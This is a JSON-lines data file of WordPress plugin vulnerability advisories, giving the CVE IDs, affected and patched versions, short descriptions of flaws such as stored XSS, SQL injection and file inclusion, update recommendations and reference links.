{"CVE_ID":"CVE-2024-9638","slug":"category-posts","versionImpact":"4.9.17","versionEndExcluding":"4.9.18","description":"The Category Posts Widget WordPress plugin before 4.9.18 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.9.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/119d5249-48e4-429e-8a1d-ad112e0c966d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/119d5249-48e4-429e-8a1d-ad112e0c966d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8680","slug":"mailchimp-for-wp","versionImpact":"4.9.16","versionEndExcluding":"4.9.17","description":"The MC4WP: Mailchimp for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.9.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 4.9.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa464547-0380-4b91-a5ea-0cd9a66da7a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa464547-0380-4b91-a5ea-0cd9a66da7a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ibericode\\\/mailchimp-for-wordpress\\\/blob\\\/main\\\/includes\\\/views\\\/parts\\\/lists-overview-details.php\",\"name\":\"https:\\\/\\\/github.com\\\/ibericode\\\/mailchimp-for-wordpress\\\/blob\\\/main\\\/includes\\\/views\\\/parts\\\/lists-overview-details.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-for-wp\\\/trunk\\\/includes\\\/views\\\/parts\\\/lists-overview-details.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-for-wp\\\/trunk\\\/includes\\\/views\\\/parts\\\/lists-overview-details.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ibericode\\\/mailchimp-for-wordpress\\\/commit\\\/60c6bfc260a7974f791af1d4ad4a032a3e0bdd3c\",\"name\":\"https:\\\/\\\/github.com\\\/ibericode\\\/mailchimp-for-wordpress\\\/commit\\\/60c6bfc260a7974f791af1d4ad4a032a3e0bdd3c\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3153075%40mailchimp-for-wp%2Ftrunk&old=3149806%40mailchimp-for-wp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3153075%40mailchimp-for-wp%2Ftrunk&old=3149806%40mailchimp-for-wp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3269","slug":"download-monitor","versionImpact":"4.9.13","versionEndExcluding":"4.9.14","description":"The Download Monitor plugin for WordPress is vulnerable to unauthorized access to functionality due to a missing capability check on the dlm_uninstall_plugin function in all versions up to, and including, 4.9.13. This makes it possible for authenticated attackers to uninstall the plugin and delete its data.","recommendation":"Update to version 4.9.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c454a958-91c4-4847-91f6-dedebf857964?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c454a958-91c4-4847-91f6-dedebf857964?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092928\\\/download-monitor\\\/trunk?contextall=1&old=3070504&old_path=%2Fdownload-monitor%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092928\\\/download-monitor\\\/trunk?contextall=1&old=3070504&old_path=%2Fdownload-monitor%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0275","slug":"wordpress-easy-paypal-payment-or-donation-accept-plugin","versionEndExcluding":"4.9.10","description":"The Easy Accept Payments for PayPal WordPress plugin before 4.9.10 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aab5d803-d621-4b12-a901-ff4447334d88\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aab5d803-d621-4b12-a901-ff4447334d88\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3888","slug":"jupiterx-core","versionImpact":"4.8.12","versionEndExcluding":"4.9.1","description":"The Jupiter X Core plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File inclusion in all versions up to, and including, 4.8.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the page with the included SVG file.","recommendation":"Update to version 4.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/inline-svg\\\/widgets\\\/inline-svg.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/inline-svg\\\/widgets\\\/inline-svg.php#L304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292376\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292376\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f36f1ea5-62f7-48f0-a8d3-a56e0c9915d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f36f1ea5-62f7-48f0-a8d3-a56e0c9915d7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5254","slug":"chatbot","versionImpact":"4.8.9","versionEndExcluding":"4.9.1","description":"The ChatBot plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.8.9 via the qcld_wb_chatbot_check_user function. This can allow unauthenticated attackers to extract sensitive data including confirmation as to whether a user name exists on the site as well as order information for existing users.","recommendation":"Update to version 4.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d897daf8-5320-4546-9a63-1d34a15b2a58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d897daf8-5320-4546-9a63-1d34a15b2a58?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/functions.php#L1224\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/functions.php#L1224\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5212","slug":"chatbot","versionImpact":"4.9.2","versionEndExcluding":"4.9.1","description":"The AI ChatBot plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to, and including, 4.8.9. This makes it possible for authenticated attackers with subscriber privileges to delete arbitrary files on the server, which makes it possible to take over affected sites as well as others sharing the same hosting account.","recommendation":"Update to one of the following versions, or a newer patched version: 4.9.1, 4.9.3","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b3f4ccb-fcc6-42ec-8e9e-03d69ae7acf2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b3f4ccb-fcc6-42ec-8e9e-03d69ae7acf2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php?rev=2957286#L576\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php?rev=2957286#L576\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5204","slug":"chatbot","versionImpact":"4.8.9","versionEndExcluding":"4.9.1","description":"The ChatBot plugin for WordPress is vulnerable to SQL Injection via the $strid parameter in versions up to, and including, 4.8.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ad12146-200b-48e5-82de-7572541edcc4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ad12146-200b-48e5-82de-7572541edcc4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/qcld-wpwbot-search.php?rev=2957286#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/qcld-wpwbot-search.php?rev=2957286#L177\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5534","slug":"chatbot","versionImpact":"4.9.2","versionEndExcluding":"4.9.1","description":"The AI ChatBot plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.8.9. This is due to missing or incorrect nonce validation on the corresponding functions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to one of the following versions, or a newer patched version: 4.9.1, 4.9.3","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/846bd929-45cd-4e91-b232-ae16dd2b12a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/846bd929-45cd-4e91-b232-ae16dd2b12a0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5533","slug":"chatbot","versionImpact":"4.9.2","versionEndExcluding":"4.9.1","description":"The AI ChatBot plugin for WordPress is vulnerable to unauthorized use of AJAX actions due to missing capability checks on the corresponding functions in versions up to, and including, 4.8.9. This makes it possible for unauthenticated attackers to perform some of those actions that were intended for higher privileged users.","recommendation":"Update to one of the following versions, or a newer patched version: 4.9.1, 4.9.3","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9db002f-ff41-493a-87b1-5f0b4b07cfc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9db002f-ff41-493a-87b1-5f0b4b07cfc2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3888","slug":"td-composer","versionImpact":"4.8","versionEndExcluding":"4.9","description":"The tagDiv Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's button shortcode in all versions up to, and including, 4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: The vulnerable code in this plugin is specifically tied to the tagDiv Newspaper theme. If another theme is installed (e.g., NewsMag), this code may not be present.","recommendation":"Update to version 4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/466fc6f3-7b2d-4975-a838-16e27bc9f9b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/466fc6f3-7b2d-4975-a838-16e27bc9f9b5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/newspaper\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/newspaper\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3814","slug":"td-composer","versionImpact":"4.8","versionEndExcluding":"4.9","description":"The tagDiv Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'single' module in all versions up to, and including, 4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c2a88c3-5c11-4b42-b8f8-aafecf6c4c74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c2a88c3-5c11-4b42-b8f8-aafecf6c4c74?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3813","slug":"td-composer","versionImpact":"4.8","versionEndExcluding":"4.9","description":"The tagDiv Composer plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8 via the 'td_block_title' shortcode 'block_template_id' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87b7bc4a-4d2f-4bcb-a9d5-72e31c95c09e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87b7bc4a-4d2f-4bcb-a9d5-72e31c95c09e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-composer-page-builder-basics\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6688","slug":"oxygenbuilder","versionImpact":"4.8.3","versionEndExcluding":"4.9","description":"The Oxygen Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the oxy_save_css_from_admin AJAX action in all versions up to, and including, 4.8.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update stylesheets.","recommendation":"Update to version 4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78c88402-52ca-44ff-8767-1f843fcb66fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78c88402-52ca-44ff-8767-1f843fcb66fd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/oxygenbuilder.com\\\/oxygen-4-9-now-available\\\/\",\"name\":\"https:\\\/\\\/oxygenbuilder.com\\\/oxygen-4-9-now-available\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13322","slug":"ap-plugin-scripteo","versionImpact":"4.88","versionEndExcluding":"4.89","description":"The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to SQL Injection via the 'a_id' parameter in all versions up to, and including, 4.88 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.89, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bcb60a8-220f-45a4-a9a9-10f64acf470c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bcb60a8-220f-45a4-a9a9-10f64acf470c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0366","slug":"jupiterx-core","versionImpact":"4.8.7","versionEndExcluding":"4.8.8","description":"The Jupiter X Core plugin for WordPress is vulnerable to Local File Inclusion to Remote Code Execution in all versions up to, and including, 4.8.7 via the get_svg() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution. In this specific case,  an attacker can create a form that allows SVG uploads, upload an SVG file with malicious content and then include the SVG file in a post to achieve remote code execution. This means it is relatively easy to gain remote code execution as a contributor-level user and above by default.","recommendation":"Update to version 4.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231122\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/ajax-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231122\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/ajax-handler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231122\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/video\\\/widgets\\\/video.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231122\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/video\\\/widgets\\\/video.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a20dc1d-eb7c-47ac-ad9a-ec4c0d5db62e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a20dc1d-eb7c-47ac-ad9a-ec4c0d5db62e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0365","slug":"jupiterx-core","versionImpact":"4.8.7","versionEndExcluding":"4.8.8","description":"The Jupiter X Core plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 4.8.7 via the inline SVG feature. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 4.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231122\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/inline-svg\\\/widgets\\\/inline-svg.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231122\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/inline-svg\\\/widgets\\\/inline-svg.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3bc5ef7-6825-463f-a3ce-d6ab1fc0e030?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3bc5ef7-6825-463f-a3ce-d6ab1fc0e030?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12316","slug":"jupiterx-core","versionImpact":"4.8.5","versionEndExcluding":"4.8.6","description":"The Jupiter X Core plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_popup_action() function in all versions up to, and including, 4.8.5. This makes it possible for unauthenticated attackers to export popup templates.","recommendation":"Update to version 4.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/popups\\\/class.php#L475\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/popups\\\/class.php#L475\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214798\\\/jupiterx-core\\\/trunk\\\/includes\\\/popups\\\/class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214798\\\/jupiterx-core\\\/trunk\\\/includes\\\/popups\\\/class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5db195c1-8917-4465-a5ca-21089afb0bc7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5db195c1-8917-4465-a5ca-21089afb0bc7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12033","slug":"jupiterx-core","versionImpact":"4.8.5","versionEndExcluding":"4.8.6","description":"The Jupiter X Core plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the sync_libraries() function in all versions up to, and including, 4.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to sync libraries","recommendation":"Update to version 4.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214798\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214798\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e452aa0-bfb9-4805-b2ed-53464a4b5308?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e452aa0-bfb9-4805-b2ed-53464a4b5308?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5991","slug":"motopress-hotel-booking-lite","versionEndExcluding":"4.8.5","description":"The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server","recommendation":"Update to version 4.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9849","slug":"real3d-flipbook-lite","versionImpact":"4.8","versionEndExcluding":"4.8.5","description":"The 3D FlipBook, PDF Viewer, PDF Embedder \u2013 Real 3D FlipBook WordPress Plugin plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'r3dfb_save_thumbnail_callback' function in all versions up to, and including, 4.6. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 4.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f99b366-1a94-41ed-813a-bb13893604d0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f99b366-1a94-41ed-813a-bb13893604d0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/real3d-flipbook-lite\\\/tags\\\/4.6\\\/includes\\\/plugin-admin.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/real3d-flipbook-lite\\\/tags\\\/4.6\\\/includes\\\/plugin-admin.php#L77\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4662","slug":"oxygenbuilder","versionImpact":"4.8.2","versionEndExcluding":"4.8.3","description":"The Oxygen Builder plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.8.2 via post metadata. This is due to the plugin storing custom data in post metadata without an underscore prefix. This makes it possible for lower privileged users, such as contributors, to inject arbitrary PHP code via the WordPress user interface and gain elevated privileges.","recommendation":"Update to version 4.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8706c3f6-64e0-440e-a802-5c80d9cc3643?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8706c3f6-64e0-440e-a802-5c80d9cc3643?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/oxygenbuilder.com\\\/oxygen-4-8-3-now-available-security-update\\\/\",\"name\":\"https:\\\/\\\/oxygenbuilder.com\\\/oxygen-4-8-3-now-available-security-update\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
